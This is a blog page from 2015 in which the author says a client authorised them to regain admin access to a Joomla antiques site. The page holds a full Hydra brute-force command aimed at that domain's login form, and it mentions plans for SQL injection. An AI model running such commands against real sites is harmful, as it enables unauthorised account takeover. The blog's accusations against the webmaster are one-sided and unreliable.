hydra -l adminv01 -P pwlist3.txt -s 80 -f www.designer-atelier-antiques.com http-post-form "antiques/administrator/index.php?page=login.php:usrname=^USER^&pass=^PASS^&login-php-submit-button=Login:Incorrect Username"
Widespread Augmented Reality
Click on the image to get the Android Augmented Reality Heads up Display
Monday, August 17, 2015
Authorized Brute Force Password Attack from 104.175.53.76
Since I have been authorized to pentest Design-atelier-antiques, I installed and ran Hydra on Ubuntu Linux. Below is an example of what I typed into the command line window.
Sunday, August 9, 2015
Shady Blackmailing Web Master
The creator of Design-Atelier-Antiques is claiming that the stakeholder owes for domain renewal payments that he has been making on their behalf. The stakeholder claims that this web master cost them $4000.00. I was astonished by this amount but even more so by the web master withholding Joomla administration access. A scan of this URL should reveal the web master name.
Meanwhile, I've continued to explore ways of regaining control via the following:
Tuesday, August 4, 2015
Permission to Hack a Site
With the disappearance of the original webmaster and having received permission to hack my client's site, I spidered the URL with Screaming Frog's SEO Spider. After reviewing the results, I determined that the Joomla site had its administrator page here. Now the fun begins with guessing the password, testing for SQL injection and brute forcing a login. Stay tuned.
Subscribe to:
Posts (Atom)